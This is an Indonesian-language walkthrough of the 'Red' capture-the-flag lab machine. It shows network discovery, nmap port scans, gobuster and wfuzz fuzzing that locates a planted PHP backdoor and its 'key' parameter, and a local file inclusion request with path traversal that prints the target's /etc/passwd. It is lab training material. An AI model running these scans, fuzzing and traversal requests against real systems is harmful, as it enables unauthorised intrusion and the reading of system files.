Red was here, Blue is a loser!
CTF RED 1: Walkthrough
Sumber: https://readysetexploit.gitlab.io/home/vulnhub/red/
nmap
Di kali linux. Cek IP address Kali Linux
hostname -I
192.168.0.156 fddc:e149:a774::5b6 fddc:e149:a774:0:f944:23ee:7982:825
Cari IP address Red
netdiscover -r 192.168.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts 19 Captured ARP Req/Rep packets, from 19 hosts. Total size: 1140 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- ..... 192.168.0.155 08:00:27:89:06:41 1 60 PCS Systemtechnik GmbH .....
Mac address 08:00:* PCS systemtechnik tampaknya adalah MAC dari VirtualBox. Maka IP address Red kita dapatkan.
Port Scan Target.
sudo nmap -v --min-rate 10000 192.168.0.155 | grep open
Discovered open port 22/tcp on 192.168.0.155 Discovered open port 80/tcp on 192.168.0.155 22/tcp open ssh 80/tcp open http
Lakukan full port scan
nmap -v -sV -sC -oN nmap 192.168.0.155 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-09 22:28 EST NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed Initiating ARP Ping Scan at 22:28 Scanning 192.168.0.155 [1 port] Completed ARP Ping Scan at 22:28, 0.02s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 22:28 Completed Parallel DNS resolution of 1 host. at 22:28, 0.01s elapsed Initiating SYN Stealth Scan at 22:28 Scanning 192.168.0.155 [65535 ports] Discovered open port 22/tcp on 192.168.0.155 Discovered open port 80/tcp on 192.168.0.155 Completed SYN Stealth Scan at 22:28, 2.68s elapsed (65535 total ports) Initiating Service scan at 22:28 Scanning 2 services on 192.168.0.155 Completed Service scan at 22:28, 13.24s elapsed (2 services on 1 host) NSE: Script scanning 192.168.0.155. Initiating NSE at 22:28 Completed NSE at 22:28, 1.02s elapsed Initiating NSE at 22:28 Completed NSE at 22:28, 0.07s elapsed Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed Nmap scan report for 192.168.0.155 Host is up (0.000096s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 8d5365835252c4127249be335dd1e71c (RSA) | 256 06610a49864364cab00c0f09177b33ba (ECDSA) |_ 256 9b8d90472ac1dc11287d57e08a23b469 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve... | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-generator: WordPress 5.8.1 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.17 seconds Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Hasilnya, target mempunya dua port yang terbuka,
Port 22 running OpenSSH Port 80 running Apache HTTP
Kita tidak bisa berbuat banyak untuk SSH, oleh karena itu mari kita jajal web.
Web
Coba akses Web
http://192.168.0.155/
Tampaknya wordpress, tapi dengan kondisi di hack.
Lihat source web (CTRL-U) Di awal source page akan tampak
<meta name='robots' content='max-image-preview:large' /> <link rel='dns-prefetch' href='//redrocks.win' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Hacked By Red » Feed" href="http://redrocks.win/feed/" /> <link rel="alternate" type="application/rss+xml" title="Hacked By Red » Comments Feed" href="http://redrocks.win/comments/feed/" />
Tampaknya redrocks.win adalah web yang menarik. Kita perlu set /etc/hosts agar ada host redrocks.win
vi /etc/hosts
Isi dengan
192.168.0.155 redrocks.win 127.0.0.1 localhost 127.0.1.1 kali ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters
Akses / Browse Web
http://redrocks.win/
Klik
Hello Blue!
Lihat source (CTRL-U). Ada clue menarik
- Ada kata2 "Looking For It?" kayanya seperti LFI - Local File Inclusion.
- Mr. Miessler yang mengupakan penulis Seclists di sebutkan.
- Juga di sebut "you won't be able to read anything"
Jika di satukan semua maka
- kemungkinan besar backdoor yang ada bukan shell backdoor biasa,
- tapi LFI.
- kemungkinan menggunakan PHP backdoors list karena WordPress berjalan di Apache PHP.
Coba di test menggunakan gobuster common PHP backdoors
apt update apt -y install golang-go go install github.com/OJ/gobuster/v3@latest apt -y install gobuster
Coba ambil CommondBackdoors-PHP untuk di cek
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
gobuster dir -w CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/ -o dir80.txt -z
Hasilnya,
=============================================================== Gobuster v3.4 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://redrocks.win/ [+] Method: GET [+] Threads: 10 [+] Wordlist: CommonBackdoors-PHP.fuzz.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.4 [+] Extensions: php [+] Timeout: 10s =============================================================== 2023/02/10 01:54:59 Starting gobuster in directory enumeration mode =============================================================== /NetworkFileManagerPHP.php (Status: 500) [Size: 0] =============================================================== 2023/02/10 01:55:12 Finished ===============================================================
Kita melihat ada file yang tidak normal NetworkFileManagerPHP.php
Local File Inclusion
cek di google keyword
NetworkFileManagerPHP.php
Hasilnya,
Mungkin maksud Anda adalah: Network File Manager PHP.php webshells/NetworkFileManagerPHP.php at master - GitHub https://github.com › BlackArch › webshells › blob › Netw... Various webshells. We accept pull requests for additions to this collection. - webshells/NetworkFileManagerPHP.php at master · BlackArch/webshells.
Tampaknya sebuah webshell. Tapi berdasarkan hint yang kita miliki Red akan menggunakan LFI backdoor.
Kita perlu menginstalasi wordlist untuk mencek keyword yang bisa di pakai untuk attack.
Hati-hati semakin besar wordlist / dictionary yang kita gunakan maka makin sulit melakukan wfuzz karena kemungkinan untuk timeout makin tinggi.
Beberapa contoh instalasi wordlist adalah,
sudo apt -y install seclists
atau yang lebih lengkap
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \ && unzip SecList.zip \ && rm -f SecList.zip
Atau kita bisa membuat file text berisi beberapa word yang mungkin bisa tembus sebagai keyword di wfuzz, misalnya
key key1 coba Attack help
Mari cek menggunakan wfuzz,
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt
Hasilnya,
******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test Total requests: 6453 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000017: 500 0 L 0 W 0 Ch "ABBR" 000000014: 500 0 L 0 W 0 Ch "3DSecureStatus" 000000016: 500 0 L 0 W 0 Ch "A" 000000015: 500 0 L 0 W 0 Ch "4" 000000013: 500 0 L 0 W 0 Ch "3" 000000019: 500 0 L 0 W 0 Ch "ACTION" 000000003: 500 0 L 0 W 0 Ch "12" 000000018: 500 0 L 0 W 0 Ch "ACCESSLEVEL" 000000001: 500 0 L 0 W 0 Ch "1" 000000007: 500 0 L 0 W 0 Ch "16" 000000012: 500 0 L 0 W 0 Ch "23" 000000011: 500 0 L 0 W 0 Ch "22" 000000006: 500 0 L 0 W 0 Ch "15" 000000010: 500 0 L 0 W 0 Ch "21" 000000002: 500 0 L 0 W 0 Ch "11" 000000009: 500 0 L 0 W 0 Ch "2" 000000008: 500 0 L 0 W 0 Ch "17" 000000005: 500 0 L 0 W 0 Ch "14" 000000004: 500 0 L 0 W 0 Ch "13"
Lanjut perjuangan mencari key yang bisa dipakai untuk LFI. Coba,
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hh 00 wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hh 500 wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hc 404 wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --hc 404,403,400,500 wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/burp-parameter-names.txt --sc 200 -s 1
Atau jika kita beruntung :) ...
wfuzz -c -u http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test -w SecLists-master/Discovery/Web-Content/key.txt
Hasilnya,
******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test Total requests: 6 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000001: 200 1 L 0 W 1 Ch "key" 000000002: 500 0 L 0 W 0 Ch "key1" 000000004: 500 0 L 0 W 0 Ch "Attack" 000000003: 500 0 L 0 W 0 Ch "coba" 000000006: 500 0 L 0 W 0 Ch "http://redrocks.win/NetworkFileManagerPHP.php?=test" 000000005: 500 0 L 0 W 0 Ch "help" Total time: 35.85189 Processed Requests: 6 Filtered Requests: 0 Requests/sec.: 0.167355
Yang menarik adalah Response 200 - ternyata di peroleh dengan Payload "key".
Jadi keyword yang bisa digunakan untuk melakukan LFI adalah "key".
Sesudah key di peroleh kita dapat browse ke web
view-source:http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../../etc/passwd
Hasilnya,
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin sshd:x:112:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin john:x:1000:1000:john:/home/john:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false ippsec:x:1001:1001:,,,:/home/ippsec:/bin/bash oxdf:x:1002:1002:,,,:/home/oxdf:/bin/bash